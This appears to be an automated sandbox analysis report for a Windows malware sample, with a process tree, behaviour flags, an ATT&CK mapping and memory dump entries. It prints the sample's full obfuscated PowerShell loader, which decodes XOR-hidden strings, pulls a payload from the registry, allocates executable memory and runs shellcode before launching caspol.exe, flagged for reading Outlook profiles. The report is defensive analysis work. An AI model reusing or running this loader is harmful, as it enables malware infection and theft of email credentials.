No'moAUnEKoECa5CyFMa8AiEAu3BlAAlAReBSk7BaAGrACiACoEunFBoCUbEOpBTeFRe8AnDAl5MuFKnCMuEUdBPoAFo4ReCAv3SnETa4StFTaCUnENo5EcEFy1KuEDrFMiAGi2KrDAf1HeCJu3ViEKo4LuFCaEWhDKnABrFlsECyFKa8hoDPi7FoBRe0ClBKa0GeDpy0BaEIdFTjFDe8BeEAl5InAOv6DoAMoABeBSiASkFai2FrBGeBSpBScATrBVsADmBFlAKeBUnAroBReAPrAFi6EcAMeANoBMyAAlFGl2FrBFi9PuBStAHaBNaAPoBInASkABi6MyAGaAOrBNoANyFBu2SeBovESuAOr3Re'Fu;SkTPlyHisFokJaeGrnNo9Ge Ta`$CyTCyeOfapazSllMaiSanGrgLa8Al;Bu`$NoTUnoTstAnaSelHulaneStrBasHe=De(inGCaeSktJo-MaIBrtReePrmRePYvrDroMupbeeKorultVayBa Dy-LePbuaTitFuhCa Ud'MeHAsKReCFaUDa:Mo\ObYLinTigAnlReeAcpStlTeaEldDrsDa\WhGAnlSiaSdnFedThuFilObaSkrPllFiyVe'Fo)In.SeDJuiHysHatPirAiiInxSk;Ba`$PeTDieDeaTezstlSoiFunApgRe9An Ta=Sa VaHKoTSmBSk Ph'KaAVeEOcDMaEinEunFCeEBaBOvFSt0TaEAn6FoEpo3GrEAg4DiECeDEsAhaASrBRe7EaAInAanDNy1FoDBo9VeFun3ByFVa9QuFLeETrEPjFunEAr7MeAKr4AsCRe9AfEAb5UdETu4GaFSoCFoEcoFsuFIr8AlFFoEClDKa7TeBPh0SuBKo0HeCMaCAaFBr8TiETu5PoEUm7MyCLn8CoEJuBspFUn9CrESuFEnBByCDiBRaEPsDPr9PrFUnEOvFSt8DrEPl3EvEPr4DaETiDHjATe2SkAMaEmuDLdEYiEin5PuFDiETrEHeBTiEGl6BeEHa6StEOuFElFSt8BuFDa9ReAEm3Ul'Sa;StTBryAjsThkCoeElnDo9Ef Hr`$brTMgeSeaChzDilBliVanBegCo9Na;Br`$LoTAsoFotVaaColFolFueAnrMisKa0Fr ta=Ur HoHivTLiBTa Le'EpDDa1HoDMi9FoFVa3RyFSu9SlFBaEBeEStFRaESo7PrAMo4QiDLa8BuFReFAtENe4SmFAsEGeEep3OlEMa7SuEMbFUnAFr4ArCec3BrESc4BeFfeEYoEDeFSwFTo8AmEAk5UoFTrAAzDdo9arEMaFStFCh8FrFunCZaESk3brEbe9BaETuFStFHi9LoAur4VeCRa7SoEExBBiFCo8FiFre9GaEIn2ViEDiBNlEFo6TuDAd7PuBHy0ovBCa0OkCst9PaEMa5FoFTiADiFRe3CaAfo2TrAEuEAfDBaESuEMoFDeEFrBPaFIl0BoECr6StEEl3ArESt4FuEBuDPoAAw6AkAHuAKaBhuATuAUn6ByAUnAFrAReARoAYdEFoCPo8HyEGa6UnEToDKlEOnFIcFUnEAfFNe8ExEBeEGeEHeFMiFLa8PoBbe9OvATa6aeAAlANaBSk9GuBMeCBrBPtAPrAbl3Sa'La;UnTanydesTrkfeeKanWh9Zi Ir`$PiTAxoTetNeaBelFrlMiesorBrsBo0Ti;Me`$DesEbifozpeeKo=Aa`$UnTMaeprarezAnlCoiSknSdgPl.YncSioKauTunRetra-Sp3De6Be0Su;va`$BaTMeoDetCoaStlOflLleMarRusPr1Ve Ki=Dr FoHHoTTwBPo Al'BaDBa1skDBn9SkFBe3ExFUn9HyFAbENiECaFCoEMa7SvApa4UnDKo8EkFBeFTaEGl4boFDmEPaETr3UnERe7afESeFReAFi4PhCAn3OvEMe4foFAkECoENdFFrFFr8CaEPr5OxFFjATeDFo9SkECaFSkFSa8GiFXeCOfEUf3ArECh9ThEAcFHeFse9OuAPa4loCBj7MiEAsBUdFAr8SaFHe9BrEFa2ReEOuBGaEDi6ShDSt7NoBIn0BlBFo0JoCTo9SeEHe5MeFFoAReFMu3NuAIn2BeAAnEWoDUdEGlEWhFTaEUsBUnFCr0PlESa6EnETi3blERe4ArEMaDPeAFi6StAHuAFoBAr9HeBUdCMuBWaAWrAIn6chAUnANaAVaEUnEDi5SmFSk8grEgd3AnAOp6AnAUnAopABiEGaFBu9BeEMa3UnFPr0SjEPiFtoAHy3In'Sa;poTBrySosphkAeeManSe9Ko Si`$SiTRhoRetTaaOflLilTyePsrPisAc1Ov;Pa`$hrTRooExtTaaInlRulReeKarSasDi2Sy Po=Bo ReHShTHaBKo Br'GuAPlEUnFUbCEfEPoBBiFPo8ZeDAm5BiFAi8BrFNuFPrECh4UnESh7unEFaFErAGaAPhBNo7shAStAHjDMi1MiDbe9NoFLy3PaFdu9EsFElEScEReFFuEsp7RuAde4StDDa8PoFDeFPoEFe4UnFMiETaEKo3RaEch7SwEExFPeARe4wiCud3auESy4BaFRaESyEseFReFsu8TeEFr5OvFInAPrDBy9TrEByFBjFSu8TrFOuCVeEJu3GrEHu9BoEInFUnFNo9MeAMi4QuCVo7ShEtvBFoFSt8ToFis9SeEVo2IgEMoBEnEDi6InDIn7unBAk0VeBBr0InCTvDAbEpoFKoFUdEUrCCaEAdEQuFHyEDy6SuELeFThEPaDMiESkBChFGeEelEUnFOvCSaCFiEFi5FlFLo8MiCBiCfeFDeFSaEUn4ThEDo9NoFRaENoEAs3CiEAf5BuELa4FoDFiADeEVi5SyEAn3GaECr4LiFstEFoERrFSuFSe8SvAIm2SeABlEgyCMi8FoEBr6BrESaDSiEEvFTyFBuEInFSo8NuEThEFrEArFNoFUn8ReBTr9CiAKv6RiASkAVeAGo2StCDeDKnCPeEEqDRaEReAUnABeCfiAHoAMa2HaDIn1StCBy3StEBo4krFSeEInDmeAPaFudEStFfy8AdDFr7ArAal6EpDNo1UnCLa3ReERe4AxFTrEFoDOvAReFPhESaFMi8AnDTh7AcAFr3DeANeALoALy2EnDse1VaDBaCBiESc5IdERo3NuEtaEboDNi7trAMi3BoAAn3TaAEn3Do'tw;StTViyOpsKokReeSanSt9Ja Ca`$HeTByoUdtTaaSulBelOmeAurUdsBe2Sa;Pa`$JeTenocotBoaRelDolSneAlrStsUn3No Ku=tj AfHViTPiBbi Ho'FoAArEUdFAbCInEchBStFCo8MiDar5ToFGl8EfFCaFcaESp4ReEFl7CoERuFMiAUn4TeCSc3heERe4GrFPaCTeEPi5InEIm1HjEunFArAMo2UlABaEZeEPa5ByFDe8ReEMa3ReACa6AdAEmEIdFLeCAmEEfBPiFoz8WoDCi5LnEBd4doFDuEmrABa3Ru'De;DdTUnyPrsChkSoeHinIn9Ti Fu`$FyTHeoOvtAfaBalBulAreTervesPr3to#Ma;""";;Function Totallers9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Fluoridizing = $Fluoridizing + $HS.Substring($i, 1); } $Fluoridizing;}$Refrustrated0 = Totallers9 'LeIDaESnXMa ';$Refrustrated1= Totallers9 $Vognmand;if([IntPtr]::size -eq 8){ start-job { param($a) powershell $a } -RunAs32 -Argument $Refrustrated1 | wait-job | Receive-Job;}else{ & ($Refrustrated0) $Refrustrated1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 138); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$epeira0=HTB 'D9F3F9FEEFE7A4EEE6E6';$epeira1=HTB 'C7E3E9F8E5F9E5ECFEA4DDE3E4B9B8A4DFE4F9EBECEFC4EBFEE3FCEFC7EFFEE2E5EEF9';$epeira2=HTB 'CDEFFEDAF8E5E9CBEEEEF8EFF9F9';$epeira3=HTB 'D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C2EBE4EEE6EFD8EFEC';$epeira4=HTB 'F9FEF8E3E4ED';$epeira5=HTB 'CDEFFEC7E5EEFFE6EFC2EBE4EEE6EF';$epeira6=HTB 'D8DED9FAEFE9E3EBE6C4EBE7EFA6AAC2E3EEEFC8F3D9E3EDA6AADAFFE8E6E3E9';$epeira7=HTB 'D8FFE4FEE3E7EFA6AAC7EBE4EBEDEFEE';$epeira8=HTB 'D8EFECE6EFE9FEEFEECEEFE6EFEDEBFEEF';$epeira9=HTB 'C3E4C7EFE7E5F8F3C7E5EEFFE6EF';$Tysken0=HTB 'C7F3CEEFE6EFEDEBFEEFDEF3FAEF';$Tysken1=HTB 'C9E6EBF9F9A6AADAFFE8E6E3E9A6AAD9EFEBE6EFEEA6AACBE4F9E3C9E6EBF9F9A6AACBFFFEE5C9E6EBF9F9';$Tysken2=HTB 'C3E4FCE5E1EF';$Tysken3=HTB 'DAFFE8E6E3E9A6AAC2E3EEEFC8F3D9E3EDA6AAC4EFFDD9E6E5FEA6AADCE3F8FEFFEBE6';$Tysken4=HTB 'DCE3F8FEFFEBE6CBE6E6E5E9';$Tysken5=HTB 'E4FEEEE6E6';$Tysken6=HTB 'C4FEDAF8E5FEEFE9FEDCE3F8FEFFEBE6C7EFE7E5F8F3';$Tysken7=HTB 'C3CFD2';$Tysken8=HTB 'D6';Set-Alias -name Tysken9 -value $Tysken7;function fkp {Param ($v_m, $v_p) ;$Teazling0 =HTB 'AEFCFFE4E7AAB7AAA2D1CBFAFACEE5E7EBE3E4D7B0B0C9FFF8F8EFE4FECEE5E7EBE3E4A4CDEFFECBF9F9EFE7E8E6E3EFF9A2A3AAF6AADDE2EFF8EFA7C5E8E0EFE9FEAAF1AAAED5A4CDE6E5E8EBE6CBF9F9EFE7E8E6F3C9EBE9E2EFAAA7CBE4EEAAAED5A4C6E5E9EBFEE3E5E4A4D9FAE6E3FEA2AEDEF3F9E1EFE4B2A3D1A7BBD7A4CFFBFFEBE6F9A2AEEFFAEFE3F8EBBAA3AAF7A3A4CDEFFEDEF3FAEFA2AEEFFAEFE3F8EBBBA3';Tysken9 $Teazling0;$Teazling5 = HTB 'AEFCEBF8D5EDFAEBAAB7AAAEFCFFE4E7A4CDEFFEC7EFFEE2E5EEA2AEEFFAEFE3F8EBB8A6AAD1DEF3FAEFD1D7D7AACAA2AEEFFAEFE3F8EBB9A6AAAEEFFAEFE3F8EBBEA3A3';Tysken9 $Teazling5;$Teazling1 = HTB 'F8EFFEFFF8E4AAAEFCEBF8D5EDFAEBA4C3E4FCE5E1EFA2AEE4FFE6E6A6AACAA2D1D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C2EBE4EEE6EFD8EFECD7A2C4EFFDA7C5E8E0EFE9FEAAD9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C2EBE4EEE6EFD8EFECA2A2C4EFFDA7C5E8E0EFE9FEAAC3E4FEDAFEF8A3A6AAA2AEFCFFE4E7A4CDEFFEC7EFFEE2E5EEA2AEEFFAEFE3F8EBBFA3A3A4C3E4FCE5E1EFA2AEE4FFE6E6A6AACAA2AEFCD5E7A3A3A3A3A6AAAEFCD5FAA3A3';Tysken9 $Teazling1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Teazling2 = HTB 'AEDCDEC8AAB7AAD1CBFAFACEE5E7EBE3E4D7B0B0C9FFF8F8EFE4FECEE5E7EBE3E4A4CEEFECE3E4EFCEF3E4EBE7E3E9CBF9F9EFE7E8E6F3A2A2C4EFFDA7C5E8E0EFE9FEAAD9F3F9FEEFE7A4D8EFECE6EFE9FEE3E5E4A4CBF9F9EFE7E8E6F3C4EBE7EFA2AEEFFAEFE3F8EBB2A3A3A6AAD1D9F3F9FEEFE7A4D8EFECE6EFE9FEE3E5E4A4CFE7E3FEA4CBF9F9EFE7E8E6F3C8FFE3E6EEEFF8CBE9E9EFF9F9D7B0B0D8FFE4A3A4CEEFECE3E4EFCEF3E4EBE7E3E9C7E5EEFFE6EFA2AEEFFAEFE3F8EBB3A6AAAEECEBE6F9EFA3A4CEEFECE3E4EFDEF3FAEFA2AEDEF3F9E1EFE4BAA6AAAEDEF3F9E1EFE4BBA6AAD1D9F3F9FEEFE7A4C7FFE6FEE3E9EBF9FECEEFE6EFEDEBFEEFD7A3';Tysken9 $Teazling2;$Teazling3 = HTB 'AEDCDEC8A4CEEFECE3E4EFC9E5E4F9FEF8FFE9FEE5F8A2AEEFFAEFE3F8EBBCA6AAD1D9F3F9FEEFE7A4D8EFECE6EFE9FEE3E5E4A4C9EBE6E6E3E4EDC9E5E4FCEFE4FEE3E5E4F9D7B0B0D9FEEBE4EEEBF8EEA6AAAEFCEBF8D5FAEBF8EBE7EFFEEFF8F9A3A4D9EFFEC3E7FAE6EFE7EFE4FEEBFEE3E5E4CCE6EBEDF9A2AEEFFAEFE3F8EBBDA3';Tysken9 $Teazling3;$Teazling4 = HTB 'AEDCDEC8A4CEEFECE3E4EFC7EFFEE2E5EEA2AEDEF3F9E1EFE4B8A6AAAEDEF3F9E1EFE4B9A6AAAEFCF8FEA6AAAEFCEBF8D5FAEBF8EBE7EFFEEFF8F9A3A4D9EFFEC3E7FAE6EFE7EFE4FEEBFEE3E5E4CCE6EBEDF9A2AEEFFAEFE3F8EBBDA3';Tysken9 $Teazling4;$Teazling5 = HTB 'F8EFFEFFF8E4AAAEDCDEC8A4C9F8EFEBFEEFDEF3FAEFA2A3';Tysken9 $Teazling5 ;}$kk = HTB 'E1EFF8E4EFE6B9B8';$Teazling6 = HTB 'AEFCEBF8D5FCEBAAB7AAD1D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C7EBF8F9E2EBE6D7B0B0CDEFFECEEFE6EFEDEBFEEFCCE5F8CCFFE4E9FEE3E5E4DAE5E3E4FEEFF8A2A2ECE1FAAAAEE1E1AAAEDEF3F9E1EFE4BEA3A6AAA2CDCEDEAACAA2D1C3E4FEDAFEF8D7A6AAD1DFC3E4FEB9B8D7A6AAD1DFC3E4FEB9B8D7A6AAD1DFC3E4FEB9B8D7A3AAA2D1C3E4FEDAFEF8D7A3A3A3';Tysken9 $Teazling6;$var_nt = fkp $Tysken5 $Tysken6;$Teazling7 = HTB 'AEC8E6EDEFFEF8EEEFF8B9AAB7AAAEFCEBF8D5FCEBA4C3E4FCE5E1EFA2D1C3E4FEDAFEF8D7B0B0D0EFF8E5A6AAB9BCBAA6AABAF2B9BABABAA6AABAF2BEBAA3';Tysken9 $Teazling7;$Teazling8 = HTB 'AEE5F8E3AAB7AAAEFCEBF8D5FCEBA4C3E4FCE5E1EFA2D1C3E4FEDAFEF8D7B0B0D0EFF8E5A6AABAF2BBBABABABABAA6AABAF2B9BABABAA6AABAF2BEA3';Tysken9 $Teazling8;$Totallers=(Get-ItemProperty -Path 'HKCU:\Yngleplads\Glandularly').Distrix;$Teazling9 = HTB 'AEDEEFEBF0E6E3E4EDAAB7AAD1D9F3F9FEEFE7A4C9E5E4FCEFF8FED7B0B0CCF8E5E7C8EBF9EFBCBED9FEF8E3E4EDA2AEDEE5FEEBE6E6EFF8F9A3';Tysken9 $Teazling9;$Totallers0 = HTB 'D1D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C7EBF8F9E2EBE6D7B0B0C9E5FAF3A2AEDEEFEBF0E6E3E4EDA6AABAA6AAAAAEC8E6EDEFFEF8EEEFF8B9A6AAB9BCBAA3';Tysken9 $Totallers0;$size=$Teazling.count-360;$Totallers1 = HTB 'D1D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C7EBF8F9E2EBE6D7B0B0C9E5FAF3A2AEDEEFEBF0E6E3E4EDA6AAB9BCBAA6AAAEE5F8E3A6AAAEF9E3F0EFA3';Tysken9 $Totallers1;$Totallers2 = HTB 'AEFCEBF8D5F8FFE4E7EFAAB7AAD1D9F3F9FEEFE7A4D8FFE4FEE3E7EFA4C3E4FEEFF8E5FAD9EFF8FCE3E9EFF9A4C7EBF8F9E2EBE6D7B0B0CDEFFECEEFE6EFEDEBFEEFCCE5F8CCFFE4E9FEE3E5E4DAE5E3E4FEEFF8A2AEC8E6EDEFFEF8EEEFF8B9A6AAA2CDCEDEAACAA2D1C3E4FEDAFEF8D7A6D1C3E4FEDAFEF8D7A3AAA2D1DCE5E3EED7A3A3A3';Tysken9 $Totallers2;$Totallers3 = HTB 'AEFCEBF8D5F8FFE4E7EFA4C3E4FCE5E1EFA2AEE5F8E3A6AEFCEBF8D5E4FEA3';Tysken9 $Totallers3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c2965e0e529631f99706fd09ed01ad43

SHA1
94b31297328b4bea6e8867c51a0918e8b2121dc4

SHA256
b98fd873a9f0df66f9ab2e1198c27bdca07c1d661dc62fd7f1a53642ff6b9ea1

SHA512
58f535482b0df0e1295875838b6025c432ff51d030e1ca944d6ded849e93dc84a1afcc38b74ff51e08374d70428cdbf547bf5b1d56aa98b93566a9ffca77a199

Download Submit
memory/960-54-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

Filesize
8KB

Download
memory/1204-76-0x0000000076F10000-0x00000000770B9000-memory.dmp

Filesize
1.7MB

Download
memory/1204-82-0x00000000770F0000-0x0000000077270000-memory.dmp

Filesize
1.5MB

Download
memory/1204-79-0x00000000770F0000-0x0000000077270000-memory.dmp

Filesize
1.5MB

Download
memory/1204-77-0x00000000770F0000-0x0000000077270000-memory.dmp

Filesize
1.5MB

Download
memory/1204-68-0x0000000072F50000-0x00000000734FB000-memory.dmp

Filesize
5.7MB

Download
memory/1204-74-0x0000000005B20000-0x0000000005C20000-memory.dmp

Filesize
1024KB

Download
memory/1204-93-0x0000000005B20000-0x0000000005C20000-memory.dmp

Filesize
1024KB

Download
memory/1204-73-0x0000000072F50000-0x00000000734FB000-memory.dmp

Filesize
5.7MB

Download
memory/1204-65-0x0000000000000000-mapping.dmp

Download
memory/1204-94-0x00000000770F0000-0x0000000077270000-memory.dmp

Filesize
1.5MB

Download
memory/1204-69-0x0000000005B20000-0x0000000005C20000-memory.dmp

Filesize
1024KB

Download
memory/1784-63-0x00000000027FB000-0x000000000281A000-memory.dmp

Filesize
124KB

Download
memory/1784-57-0x000007FEF3410000-0x000007FEF3E33000-memory.dmp

Filesize
10.1MB

Download
memory/1784-71-0x00000000027FB000-0x000000000281A000-memory.dmp

Filesize
124KB

Download
memory/1784-60-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

Filesize
3.0MB

Download
memory/1784-59-0x000007FEF28B0000-0x000007FEF340D000-memory.dmp

Filesize
11.4MB

Download
memory/1784-70-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1784-55-0x0000000000000000-mapping.dmp

Download
memory/1784-58-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1936-72-0x0000000072F50000-0x00000000734FB000-memory.dmp

Filesize
5.7MB

Download
memory/1936-64-0x0000000072F50000-0x00000000734FB000-memory.dmp

Filesize
5.7MB

Download
memory/1936-62-0x0000000075141000-0x0000000075143000-memory.dmp

Filesize
8KB

Download
memory/1936-61-0x0000000000000000-mapping.dmp

Download
memory/2028-80-0x000000000002768E-mapping.dmp

Download
memory/2028-87-0x0000000076F10000-0x00000000770B9000-memory.dmp

Filesize
1.7MB

Download
memory/2028-88-0x00000000770F0000-0x0000000077270000-memory.dmp

Filesize
1.5MB

Download
memory/2028-89-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/2028-90-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/2028-92-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2028-83-0x0000000000170000-0x0000000000270000-memory.dmp

Filesize
1024KB

Download
memory/2028-81-0x0000000000170000-0x0000000000270000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads